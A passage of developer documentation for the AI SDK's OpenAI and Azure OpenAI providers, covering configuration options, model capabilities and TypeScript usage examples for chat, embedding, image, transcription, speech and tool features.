const acceptedPredictionTokens = openaiMetadata?.acceptedPredictionTokens;
const rejectedPredictionTokens = openaiMetadata?.rejectedPredictionTokens;

Image Detail

You can use the openai provider option to set the image input detail to high, low, or auto:

const result = await generateText({
  model: openai.chat('gpt-5'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'Describe the image in detail.' },
        {
          type: 'image',
          image:
            'https://github.com/vercel/ai/blob/main/examples/ai-functions/data/comic-cat.png?raw=true',

          // OpenAI specific options - image detail:
          providerOptions: {
            openai: { imageDetail: 'low' },
          },
        },
      ],
    },
  ],
});

Distillation

import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';
import 'dotenv/config';

async function main() {
  const { text, usage } = await generateText({
    model: openai.chat('gpt-4o-mini'),
    prompt: 'Who worked on the original macintosh?',
    providerOptions: {
      openai: {
        store: true,
        metadata: {
          custom: 'value',
        },
      } satisfies OpenAILanguageModelChatOptions,
    },
  });

  console.log(text);
  console.log();
  console.log('Usage:', usage);
}

main().catch(console.error);

Prompt Caching

OpenAI has introduced Prompt Caching for supported models including gpt-4o and gpt-4o-mini.

Prompt caching is automatically enabled for these models, when the prompt is 1024 tokens or longer. It does not need to be explicitly enabled.
You can use response providerMetadata to access the number of prompt tokens that were a cache hit.
Note that caching behavior is dependent on load on OpenAI's infrastructure. Prompt prefixes generally remain in the cache following 5-10 minutes of inactivity before they are evicted, but during off-peak periods they may persist for up to an hour.

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const { text, usage, providerMetadata } = await generateText({
  model: openai.chat('gpt-4o-mini'),
  prompt: `A 1024-token or longer prompt...`,
});

console.log(`usage:`, {
  ...usage,
  cachedPromptTokens: providerMetadata?.openai?.cachedPromptTokens,
});

To improve cache hit rates, you can manually control caching using the promptCacheKey option:

import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';

const { text, usage, providerMetadata } = await generateText({
  model: openai.chat('gpt-5'),
  prompt: `A 1024-token or longer prompt...`,
  providerOptions: {
    openai: {
      promptCacheKey: 'my-custom-cache-key-123',
    } satisfies OpenAILanguageModelChatOptions,
  },
});

console.log(`usage:`, {
  ...usage,
  cachedPromptTokens: providerMetadata?.openai?.cachedPromptTokens,
});

For GPT-5.1 models, you can enable extended prompt caching that keeps cached prefixes active for up to 24 hours:

import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';

const { text, usage, providerMetadata } = await generateText({
  model: openai.chat('gpt-5.1'),
  prompt: `A 1024-token or longer prompt...`,
  providerOptions: {
    openai: {
      promptCacheKey: 'my-custom-cache-key-123',
      promptCacheRetention: '24h', // Extended caching for GPT-5.1
    } satisfies OpenAILanguageModelChatOptions,
  },
});

console.log(`usage:`, {
  ...usage,
  cachedPromptTokens: providerMetadata?.openai?.cachedPromptTokens,
});

Audio Input

With the gpt-4o-audio-preview model, you can pass audio files to the model.

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai.chat('gpt-4o-audio-preview'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'What is the audio saying?' },
        {
          type: 'file',
          mediaType: 'audio/mpeg',
          data: readFileSync('./data/galileo.mp3'),
        },
      ],
    },
  ],
});

Completion Models

You can create models that call the OpenAI completions API using the .completion() factory method. The first argument is the model id. Currently only gpt-3.5-turbo-instruct is supported.

const model = openai.completion('gpt-3.5-turbo-instruct');

OpenAI completion models support also some model specific settings that are not part of the standard call settings. You can pass them as an options argument:

const model = openai.completion('gpt-3.5-turbo-instruct');

await model.doGenerate({
  providerOptions: {
    openai: {
      echo: true, // optional, echo the prompt in addition to the completion
      logitBias: {
        // optional likelihood for specific tokens
        '50256': -100,
      },
      suffix: 'some text', // optional suffix that comes after a completion of inserted text
      user: 'test-user', // optional unique user identifier
    } satisfies OpenAILanguageModelCompletionOptions,
  },
});

The following optional provider options are available for OpenAI completion models:

echo: boolean

Echo back the prompt in addition to the completion.
logitBias Record<number, number>

Modifies the likelihood of specified tokens appearing in the completion.

Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token.

As an example, you can pass {"50256": -100} to prevent the <|endoftext|> token from being generated.
logprobs boolean | number

Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving.

Setting to true will return the log probabilities of the tokens that were generated.

Setting to a number will return the log probabilities of the top n tokens that were generated.
suffix string

The suffix that comes after a completion of inserted text.
user string

A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.

Model Capabilities

Model	Image Input	Audio Input	Object Generation	Tool Usage
`gpt-5.4-pro`
`gpt-5.4`
`gpt-5.4-mini`
`gpt-5.4-nano`
`gpt-5.3-chat-latest`
`gpt-5.2-pro`
`gpt-5.2-chat-latest`
`gpt-5.2`
`gpt-5.1-codex-mini`
`gpt-5.1-codex`
`gpt-5.1-chat-latest`
`gpt-5.1`
`gpt-5-pro`
`gpt-5`
`gpt-5-mini`
`gpt-5-nano`
`gpt-5-codex`
`gpt-5-chat-latest`
`gpt-4.1`
`gpt-4.1-mini`
`gpt-4.1-nano`
`gpt-4o`
`gpt-4o-mini`

Embedding Models

You can create models that call the OpenAI embeddings API using the .embedding() factory method.

const model = openai.embedding('text-embedding-3-large');

OpenAI embedding models support several additional provider options. You can pass them as an options argument:

import { openai, type OpenAIEmbeddingModelOptions } from '@ai-sdk/openai';
import { embed } from 'ai';

const { embedding } = await embed({
  model: openai.embedding('text-embedding-3-large'),
  value: 'sunny day at the beach',
  providerOptions: {
    openai: {
      dimensions: 512, // optional, number of dimensions for the embedding
      user: 'test-user', // optional unique user identifier
    } satisfies OpenAIEmbeddingModelOptions,
  },
});

The following optional provider options are available for OpenAI embedding models:

dimensions: number

The number of dimensions the resulting output embeddings should have. Only supported in text-embedding-3 and later models.
user string

A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.

Model Capabilities

Model	Default Dimensions	Custom Dimensions
`text-embedding-3-large`	3072
`text-embedding-3-small`	1536
`text-embedding-ada-002`	1536

Image Models

You can create models that call the OpenAI image generation API using the .image() factory method.

const model = openai.image('dall-e-3');

Image Editing

OpenAI's gpt-image-1 model supports powerful image editing capabilities. Pass input images via prompt.images to transform, combine, or edit existing images.

Basic Image Editing

Transform an existing image using text prompts:

const imageBuffer = readFileSync('./input-image.png');

const { images } = await generateImage({
  model: openai.image('gpt-image-1'),
  prompt: {
    text: 'Turn the cat into a dog but retain the style of the original image',
    images: [imageBuffer],
  },
});

Inpainting with Mask

Edit specific parts of an image using a mask. Transparent areas in the mask indicate where the image should be edited:

const image = readFileSync('./input-image.png');
const mask = readFileSync('./mask.png'); // Transparent areas = edit regions

const { images } = await generateImage({
  model: openai.image('gpt-image-1'),
  prompt: {
    text: 'A sunlit indoor lounge area with a pool containing a flamingo',
    images: [image],
    mask: mask,
  },
});

Background Removal

Remove the background from an image by setting background to transparent:

const imageBuffer = readFileSync('./input-image.png');

const { images } = await generateImage({
  model: openai.image('gpt-image-1'),
  prompt: {
    text: 'do not change anything',
    images: [imageBuffer],
  },
  providerOptions: {
    openai: {
      background: 'transparent',
      output_format: 'png',
    },
  },
});

Multi-Image Combining

Combine multiple reference images into a single output. gpt-image-1 supports up to 16 input images:

const cat = readFileSync('./cat.png');
const dog = readFileSync('./dog.png');
const owl = readFileSync('./owl.png');
const bear = readFileSync('./bear.png');

const { images } = await generateImage({
  model: openai.image('gpt-image-1'),
  prompt: {
    text: 'Combine these animals into a group photo, retaining the original style',
    images: [cat, dog, owl, bear],
  },
});

Model Capabilities

Model	Sizes
`gpt-image-1.5`	1024x1024, 1536x1024, 1024x1536
`gpt-image-1-mini`	1024x1024, 1536x1024, 1024x1536
`gpt-image-1`	1024x1024, 1536x1024, 1024x1536
`dall-e-3`	1024x1024, 1792x1024, 1024x1792
`dall-e-2`	256x256, 512x512, 1024x1024

You can pass optional providerOptions to the image model. These are prone to change by OpenAI and are model dependent. For example, the gpt-image-1 model supports the quality option:

const { image, providerMetadata } = await generateImage({
  model: openai.image('gpt-image-1.5'),
  prompt: 'A salamander at sunrise in a forest pond in the Seychelles.',
  providerOptions: {
    openai: { quality: 'high' },
  },
});

For more on generateImage() see Image Generation.

OpenAI's image models return additional metadata in the response that can be accessed via providerMetadata.openai. The following OpenAI-specific metadata is available:

images Array<object>

Array of image-specific metadata. Each image object may contain:
- revisedPrompt string - The revised prompt that was actually used to generate the image (OpenAI may modify your prompt for safety or clarity)
- created number - The Unix timestamp (in seconds) of when the image was created
- size string - The size of the generated image. One of 1024x1024, 1024x1536, or 1536x1024
- quality string - The quality of the generated image. One of low, medium, or high
- background string - The background parameter used for the image generation. Either transparent or opaque
- outputFormat string - The output format of the generated image. One of png, webp, or jpeg

For more information on the available OpenAI image model options, see the OpenAI API reference.

Transcription Models

You can create models that call the OpenAI transcription API using the .transcription() factory method.

The first argument is the model id e.g. whisper-1.

const model = openai.transcription('whisper-1');

import { experimental_transcribe as transcribe } from 'ai';
import { openai, type OpenAITranscriptionModelOptions } from '@ai-sdk/openai';

const result = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: new Uint8Array([1, 2, 3, 4]),
  providerOptions: {
    openai: { language: 'en' } satisfies OpenAITranscriptionModelOptions,
  },
});

To get word-level timestamps, specify the granularity:

import { experimental_transcribe as transcribe } from 'ai';
import { openai, type OpenAITranscriptionModelOptions } from '@ai-sdk/openai';

const result = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: new Uint8Array([1, 2, 3, 4]),
  providerOptions: {
    openai: {
      //timestampGranularities: ['word'],
      timestampGranularities: ['segment'],
    } satisfies OpenAITranscriptionModelOptions,
  },
});

// Access word-level timestamps
console.log(result.segments); // Array of segments with startSecond/endSecond

The following provider options are available:

timestampGranularities string[] The granularity of the timestamps in the transcription. Defaults to ['segment']. Possible values are ['word'], ['segment'], and ['word', 'segment']. Note: There is no additional latency for segment timestamps, but generating word timestamps incurs additional latency.
language string The language of the input audio. Supplying the input language in ISO-639-1 format (e.g. 'en') will improve accuracy and latency. Optional.
prompt string An optional text to guide the model's style or continue a previous audio segment. The prompt should match the audio language. Optional.
temperature number The sampling temperature, between 0 and 1. Higher values like 0.8 will make the output more random, while lower values like 0.2 will make it more focused and deterministic. If set to 0, the model will use log probability to automatically increase the temperature until certain thresholds are hit. Defaults to 0. Optional.
include string[] Additional information to include in the transcription response.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`whisper-1`
`gpt-4o-mini-transcribe`
`gpt-4o-transcribe`

Speech Models

You can create models that call the OpenAI speech API using the .speech() factory method.

The first argument is the model id e.g. tts-1.

const model = openai.speech('tts-1');

The voice argument can be set to one of OpenAI's available voices: alloy, ash, coral, echo, fable, onyx, nova, sage, or shimmer.

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai } from '@ai-sdk/openai';

const result = await generateSpeech({
  model: openai.speech('tts-1'),
  text: 'Hello, world!',
  voice: 'alloy', // OpenAI voice ID
});

You can also pass additional provider-specific options using the providerOptions argument:

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai, type OpenAISpeechModelOptions } from '@ai-sdk/openai';

const result = await generateSpeech({
  model: openai.speech('tts-1'),
  text: 'Hello, world!',
  voice: 'alloy',
  providerOptions: {
    openai: {
      speed: 1.2,
    } satisfies OpenAISpeechModelOptions,
  },
});

instructions string Control the voice of your generated audio with additional instructions e.g. "Speak in a slow and steady tone". Does not work with tts-1 or tts-1-hd. Optional.
speed number The speed of the generated audio. Select a value from 0.25 to 4.0. Defaults to 1.0. Optional.

Model Capabilities

Model	Instructions
`tts-1`
`tts-1-hd`
`gpt-4o-mini-tts`

title: Azure OpenAI description: Learn how to use the Azure OpenAI provider for the AI SDK.

Azure OpenAI Provider

The Azure OpenAI provider contains language model support for the Azure OpenAI chat API.

Setup

The Azure OpenAI provider is available in the @ai-sdk/azure module. You can install it with

Provider Instance

You can import the default provider instance azure from @ai-sdk/azure:

import { azure } from '@ai-sdk/azure';

If you need a customized setup, you can import createAzure from @ai-sdk/azure and create a provider instance with your settings:

import { createAzure } from '@ai-sdk/azure';

const azure = createAzure({
  resourceName: 'your-resource-name', // Azure resource name
  apiKey: 'your-api-key',
});

You can use the following optional settings to customize the OpenAI provider instance:

resourceName string

Azure resource name. It defaults to the AZURE_RESOURCE_NAME environment variable.

The resource name is used in the assembled URL: https://{resourceName}.openai.azure.com/openai/v1{path}. You can use baseURL instead to specify the URL prefix.
apiKey string

API key that is being sent using the api-key header. It defaults to the AZURE_API_KEY environment variable.
apiVersion string

Sets a custom api version. Defaults to v1.
baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers.

Either this or resourceName can be used. When a baseURL is provided, the resourceName is ignored.

With a baseURL, the resolved URL is {baseURL}/v1{path}.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
useDeploymentBasedUrls boolean

Use deployment-based URLs for API calls. Set to true to use the legacy deployment format: {baseURL}/deployments/{deploymentId}{path}?api-version={apiVersion} instead of {baseURL}/v1{path}?api-version={apiVersion}. Defaults to false.

This option is useful for compatibility with certain Azure OpenAI models or deployments that require the legacy endpoint format.

Language Models

The Azure OpenAI provider instance is a function that you can invoke to create a language model:

const model = azure('your-deployment-name');

You need to pass your deployment name as the first argument.

Reasoning Models

import { azure } from '@ai-sdk/azure';
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';

const enhancedModel = wrapLanguageModel({
  model: azure('your-deepseek-r1-deployment-name'),
  middleware: extractReasoningMiddleware({ tagName: 'think' }),
});

You can then use that enhanced model in functions like generateText and streamText.

Example

You can use OpenAI language models to generate text with the generateText function:

import { azure } from '@ai-sdk/azure';
import { generateText } from 'ai';

const { text } = await generateText({
  model: azure('your-deployment-name'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

OpenAI language models can also be used in the streamText function and support structured data generation with Output (see AI SDK Core).

Provider Options

import { azure, type OpenAILanguageModelResponsesOptions } from '@ai-sdk/azure';

const messages = [
  {
    role: 'user',
    content: [
      {
        type: 'text',
        text: 'What is the capital of the moon?',
      },
      {
        type: 'image',
        image: 'https://example.com/image.png',
        providerOptions: {
          openai: { imageDetail: 'low' },
        },
      },
    ],
  },
];

const { text } = await generateText({
  model: azure('your-deployment-name'),
  providerOptions: {
    openai: {
      reasoningEffort: 'low',
    } satisfies OpenAILanguageModelResponsesOptions,
  },
});

Chat Models

You can create models that call the Azure OpenAI chat completions API using the .chat() factory method:

const model = azure.chat('your-deployment-name');

Azure OpenAI chat models support also some model specific settings that are not part of the standard call settings. You can pass them as an options argument:

import { azure, type OpenAILanguageModelChatOptions } from '@ai-sdk/azure';
import { generateText } from 'ai';

const result = await generateText({
  model: azure.chat('your-deployment-name'),
  prompt: 'Write a short story about a robot.',
  providerOptions: {
    openai: {
      logitBias: {
        // optional likelihood for specific tokens
        '50256': -100,
      },
      user: 'test-user', // optional unique user identifier
    } satisfies OpenAILanguageModelChatOptions,
  },
});

The following optional provider options are available for OpenAI chat models:

logitBias Record<number, number>

Modifies the likelihood of specified tokens appearing in the completion.

Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token.

As an example, you can pass {"50256": -100} to prevent the token from being generated.
logprobs boolean | number

Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving.

Setting to true will return the log probabilities of the tokens that were generated.

Setting to a number will return the log probabilities of the top n tokens that were generated.
parallelToolCalls boolean

Whether to enable parallel function calling during tool use. Default to true.
user string

A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.

Responses Models

Azure OpenAI uses responses API as default with the azure(deploymentName) factory method.

const model = azure('your-deployment-name');

Further configuration can be done using OpenAI provider options. You can validate the provider options using the OpenAILanguageModelResponsesOptions type.

import { azure, OpenAILanguageModelResponsesOptions } from '@ai-sdk/azure';
import { generateText } from 'ai';

const result = await generateText({
  model: azure('your-deployment-name'),
  providerOptions: {
    azure: {
      parallelToolCalls: false,
      store: false,
      user: 'user_123',
      // ...
    } satisfies OpenAILanguageModelResponsesOptions,
  },
  // ...
});

The following provider options are available:

parallelToolCalls boolean Whether to use parallel tool calls. Defaults to true.
store boolean Whether to store the generation. Defaults to true.
metadata Record<string, string> Additional metadata to store with the generation.
previousResponseId string The ID of the previous response. You can use it to continue a conversation. Defaults to undefined.
instructions string Instructions for the model. They can be used to change the system or developer message when continuing a conversation using the previousResponseId option. Defaults to undefined.
user string A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Defaults to undefined.
reasoningEffort 'low' | 'medium' | 'high' Reasoning effort for reasoning models. Defaults to medium. If you use providerOptions to set the reasoningEffort option, this model setting will be ignored.
strictJsonSchema boolean Whether to use strict JSON schema validation. Defaults to false.

The Azure OpenAI provider also returns provider-specific metadata:

For Responses models (azure(deploymentName)), you can type this metadata using AzureResponsesProviderMetadata:

import { azure, type AzureResponsesProviderMetadata } from '@ai-sdk/azure';
import { generateText } from 'ai';

const result = await generateText({
  model: azure('your-deployment-name'),
});

const providerMetadata = result.providerMetadata as
  | AzureResponsesProviderMetadata
  | undefined;

const { responseId, logprobs, serviceTier } = providerMetadata?.azure ?? {};

// responseId can be used to continue a conversation (previousResponseId).
console.log(responseId);

The following Azure-specific metadata may be returned:

responseId string | null | undefined The ID of the response. Can be used to continue a conversation.
logprobs (optional) Log probabilities of output tokens (when enabled).
serviceTier (optional) Service tier information returned by the API.

Web Search Tool

The Azure OpenAI responses API supports web search(preview) through the azure.tools.webSearchPreview tool.

const result = await generateText({
  model: azure('gpt-4.1-mini'),
  prompt: 'What happened in San Francisco last week?',
  tools: {
    web_search_preview: azure.tools.webSearchPreview({
      // optional configuration:
      searchContextSize: 'low',
      userLocation: {
        type: 'approximate',
        city: 'San Francisco',
        region: 'California',
      },
    }),
  },
  // Force web search tool (optional):
  toolChoice: { type: 'tool', toolName: 'web_search_preview' },
});

console.log(result.text);

// URL sources directly from `results`
const sources = result.sources;
for (const source of sources) {
  console.log('source:', source);
}

File Search Tool

The Azure OpenAI provider supports file search through the azure.tools.fileSearch tool.

You can force the use of the file search tool by setting the toolChoice parameter to { type: 'tool', toolName: 'file_search' }.

const result = await generateText({
  model: azure('gpt-5'),
  prompt: 'What does the document say about user authentication?',
  tools: {
    file_search: azure.tools.fileSearch({
      // optional configuration:
      vectorStoreIds: ['vs_123', 'vs_456'],
      maxNumResults: 10,
      ranking: {
        ranker: 'auto',
      },
    }),
  },
  // Force file search tool:
  toolChoice: { type: 'tool', toolName: 'file_search' },
});

Image Generation Tool

Azure OpenAI's Responses API supports multi-modal image generation as a provider-defined tool. Availability is restricted to specific models (for example, gpt-5 variants).

import { createAzure } from '@ai-sdk/azure';
import { generateText } from 'ai';

const azure = createAzure({
  headers: {
    'x-ms-oai-image-generation-deployment': 'gpt-image-1', // use your own image model deployment
  },
});

const result = await generateText({
  model: azure('gpt-5'),
  prompt:
    'Generate an image of an echidna swimming across the Mozambique channel.',
  tools: {
    image_generation: azure.tools.imageGeneration({ outputFormat: 'png' }),
  },
});

for (const toolResult of result.staticToolResults) {
  if (toolResult.toolName === 'image_generation') {
    const base64Image = toolResult.output.result;
  }
}

Code Interpreter Tool

The Azure OpenAI provider supports the code interpreter tool through the azure.tools.codeInterpreter tool. This allows models to write and execute Python code.

import { azure } from '@ai-sdk/azure';
import { generateText } from 'ai';

const result = await generateText({
  model: azure('gpt-5'),
  prompt: 'Write and run Python code to calculate the factorial of 10',
  tools: {
    code_interpreter: azure.tools.codeInterpreter({
      // optional configuration:
      container: {
        fileIds: ['assistant-123', 'assistant-456'], // optional file IDs to make available
      },
    }),
  },
});

The code interpreter tool can be configured with:

container: Either a container ID string or an object with fileIds to specify uploaded files that should be available to the code interpreter

PDF support

The Azure OpenAI provider supports reading PDF files. You can pass PDF files as part of the message content using the file type:

const result = await generateText({
  model: azure('your-deployment-name'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model?',
        },
        {
          type: 'file',
          data: fs.readFileSync('./data/ai.pdf'),
          mediaType: 'application/pdf',
          filename: 'ai.pdf', // optional
        },
      ],
    },
  ],
});

Typed providerMetadata in Text Parts

When using the Azure OpenAI Responses API, the SDK attaches Azure OpenAI-specific metadata to output parts via providerMetadata.

For text parts, when part.type === 'text', the providerMetadata is provided in the form of AzureResponsesTextProviderMetadata.

This metadata includes the following fields:

itemId
The ID of the output item in the Responses API.
annotations (optional) An array of annotation objects generated by the model. If no annotations are present, this property itself may be omitted (undefined).

Each element in annotations is a discriminated union with a required type field. Supported types include, for example:
- url_citation
- file_citation
- container_file_citation
- file_path
These annotations directly correspond to the annotation objects defined by the Responses API and can be used for inline reference rendering or output analysis. For details, see the official OpenAI documentation: Responses API – output text annotations.

import { azure, type AzureResponsesTextProviderMetadata } from '@ai-sdk/azure';
import { generateText } from 'ai';

const result = await generateText({
  model: azure('gpt-4.1-mini'),
  prompt:
    'Create a program that generates five random numbers between 1 and 100 with two decimal places, and show me the execution results. Also save the result to a file.',
  tools: {
    code_interpreter: azure.tools.codeInterpreter(),
    web_search_preview: azure.tools.webSearchPreview({}),
    file_search: azure.tools.fileSearch({ vectorStoreIds: ['vs_1234'] }), // requires a configured vector store
  },
});

for (const part of result.content) {
  if (part.type === 'text') {
    const providerMetadata = part.providerMetadata as
      | AzureResponsesTextProviderMetadata
      | undefined;
    if (!providerMetadata) continue;
    const { itemId: _itemId, annotations } = providerMetadata.azure;

    if (!annotations) continue;
    for (const annotation of annotations) {
      switch (annotation.type) {
        case 'url_citation':
          // url_citation is returned from web_search and provides:
          // properties: type, url, title, start_index and end_index
          break;
        case 'file_citation':
          // file_citation is returned from file_search and provides:
          // properties: type, file_id, filename and index
          break;
        case 'container_file_citation':
          // container_file_citation is returned from code_interpreter and provides:
          // properties: type, container_id, file_id, filename, start_index and end_index
          break;
        case 'file_path':
          // file_path provides:
          // properties: type, file_id and index
          break;
        default: {
          const _exhaustiveCheck: never = annotation;
          throw new Error(
            `Unhandled annotation: ${JSON.stringify(_exhaustiveCheck)}`,
          );
        }
      }
    }
  }
}

Typed providerMetadata in Reasoning Parts

When using the Azure OpenAI Responses API, reasoning output parts can include provider metadata. To handle this metadata in a type-safe way, use AzureResponsesReasoningProviderMetadata.

For reasoning parts, when part.type === 'reasoning', the providerMetadata is provided in the form of AzureResponsesReasoningProviderMetadata.

This metadata includes the following fields:

itemId
The ID of the reasoning item in the Responses API.
reasoningEncryptedContent (optional)
Encrypted reasoning content (only returned when requested via include: ['reasoning.encrypted_content']).

import {
  azure,
  type AzureResponsesReasoningProviderMetadata,
  type OpenAILanguageModelResponsesOptions,
} from '@ai-sdk/azure';
import { generateText } from 'ai';

const result = await generateText({
  model: azure('your-deployment-name'),
  prompt: 'How many "r"s are in the word "strawberry"?',
  providerOptions: {
    azure: {
      store: false,
      include: ['reasoning.encrypted_content'],
    } satisfies OpenAILanguageModelResponsesOptions,
  },
});

for (const part of result.content) {
  if (part.type === 'reasoning') {
    const providerMetadata = part.providerMetadata as
      | AzureResponsesReasoningProviderMetadata
      | undefined;

    const { itemId, reasoningEncryptedContent } = providerMetadata?.azure ?? {};
    console.log(itemId, reasoningEncryptedContent);
  }
}

Typed providerMetadata in Source Document Parts

For source document parts, when part.type === 'source' and sourceType === 'document', the providerMetadata is provided as AzureResponsesSourceDocumentProviderMetadata.

This metadata is also a discriminated union with a required type field. Supported types include:

file_citation
container_file_citation
file_path

Each type includes the identifiers required to work with the referenced resource, such as fileId and containerId.

import {
  azure,
  type AzureResponsesSourceDocumentProviderMetadata,
} from '@ai-sdk/azure';
import { generateText } from 'ai';

const result = await generateText({
  model: azure('gpt-4.1-mini'),
  prompt:
    'Create a program that generates five random numbers between 1 and 100 with two decimal places, and show me the execution results. Also save the result to a file.',
  tools: {
    code_interpreter: azure.tools.codeInterpreter(),
    web_search_preview: azure.tools.webSearchPreview({}),
    file_search: azure.tools.fileSearch({ vectorStoreIds: ['vs_1234'] }), // requires a configured vector store
  },
});

for (const part of result.content) {
  if (part.type === 'source') {
    if (part.sourceType === 'document') {
      const providerMetadata = part.providerMetadata as
        | AzureResponsesSourceDocumentProviderMetadata
        | undefined;
      if (!providerMetadata) continue;
      const annotation = providerMetadata.azure;
      switch (annotation.type) {
        case 'file_citation':
          // file_citation is returned from file_search and provides:
          // properties: type, fileId and index
          // The filename can be accessed via part.filename.
          break;
        case 'container_file_citation':
          // container_file_citation is returned from code_interpreter and provides:
          // properties: type, containerId and fileId
          // The filename can be accessed via part.filename.
          break;
        case 'file_path':
          // file_path provides:
          // properties: type, fileId and index
          break;
        default: {
          const _exhaustiveCheck: never = annotation;
          throw new Error(
            `Unhandled annotation: ${JSON.stringify(_exhaustiveCheck)}`,
          );
        }
      }
    }
  }
}

Completion Models

You can create models that call the completions API using the .completion() factory method. The first argument is the model id. Currently only gpt-35-turbo-instruct is supported.

const model = azure.completion('your-gpt-35-turbo-instruct-deployment');

OpenAI completion models support also some model specific settings that are not part of the standard call settings. You can pass them as an options argument:

import {
  azure,
  type OpenAILanguageModelCompletionOptions,
} from '@ai-sdk/azure';
import { generateText } from 'ai';

const result = await generateText({
  model: azure.completion('your-gpt-35-turbo-instruct-deployment'),
  prompt: 'Write a haiku about coding.',
  providerOptions: {
    openai: {
      echo: true, // optional, echo the prompt in addition to the completion
      logitBias: {
        // optional likelihood for specific tokens
        '50256': -100,
      },
      suffix: 'some text', // optional suffix that comes after a completion of inserted text
      user: 'test-user', // optional unique user identifier
    } satisfies OpenAILanguageModelCompletionOptions,
  },
});

The following optional provider options are available for Azure OpenAI completion models:

echo: boolean

Echo back the prompt in addition to the completion.
logitBias Record<number, number>

Modifies the likelihood of specified tokens appearing in the completion.

Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token.

As an example, you can pass {"50256": -100} to prevent the <|endoftext|> token from being generated.
logprobs boolean | number

Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving.

Setting to true will return the log probabilities of the tokens that were generated.

Setting to a number will return the log probabilities of the top n tokens that were generated.
suffix string

The suffix that comes after a completion of inserted text.
user string

A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.

Embedding Models

You can create models that call the Azure OpenAI embeddings API using the .embedding() factory method.

const model = azure.embedding('your-embedding-deployment');

Azure OpenAI embedding models support several additional settings. You can pass them as an options argument:

import { azure, type OpenAIEmbeddingModelOptions } from '@ai-sdk/azure';
import { embed } from 'ai';

const { embedding } = await embed({
  model: azure.embedding('your-embedding-deployment'),
  value: 'sunny day at the beach',
  providerOptions: {
    openai: {
      dimensions: 512, // optional, number of dimensions for the embedding
      user: 'test-user', // optional unique user identifier
    } satisfies OpenAIEmbeddingModelOptions,
  },
});

The following optional provider options are available for Azure OpenAI embedding models:

dimensions: number

The number of dimensions the resulting output embeddings should have. Only supported in text-embedding-3 and later models.
user string

A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.

Image Models

You can create models that call the Azure OpenAI image generation API (DALL-E) using the .image() factory method. The first argument is your deployment name for the DALL-E model.

const model = azure.image('your-dalle-deployment-name');

Azure OpenAI image models support several additional settings. You can pass them as providerOptions.openai when generating the image:

await generateImage({
  model: azure.image('your-dalle-deployment-name'),
  prompt: 'A photorealistic image of a cat astronaut floating in space',
  size: '1024x1024', // '1024x1024', '1792x1024', or '1024x1792' for DALL-E 3
  providerOptions: {
    openai: {
      user: 'test-user', // optional unique user identifier
      responseFormat: 'url', // 'url' or 'b64_json', defaults to 'url'
    },
  },
});

Example

You can use Azure OpenAI image models to generate images with the generateImage function:

import { azure } from '@ai-sdk/azure';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: azure.image('your-dalle-deployment-name'),
  prompt: 'A photorealistic image of a cat astronaut floating in space',
  size: '1024x1024', // '1024x1024', '1792x1024', or '1024x1792' for DALL-E 3
});

// image contains the URL or base64 data of the generated image
console.log(image);

Model Capabilities

Azure OpenAI supports DALL-E 2 and DALL-E 3 models through deployments. The capabilities depend on which model version your deployment is using:

Model Version	Sizes
DALL-E 3	1024x1024, 1792x1024, 1024x1792
DALL-E 2	256x256, 512x512, 1024x1024

Transcription Models

You can create models that call the Azure OpenAI transcription API using the .transcription() factory method.

The first argument is the model id e.g. whisper-1.

const model = azure.transcription('whisper-1');

const azure = createAzure({
  useDeploymentBasedUrls: true,
  apiVersion: '2025-04-01-preview',
});

import { experimental_transcribe as transcribe } from 'ai';
import { azure, type OpenAITranscriptionModelOptions } from '@ai-sdk/azure';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: azure.transcription('whisper-1'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    openai: {
      language: 'en',
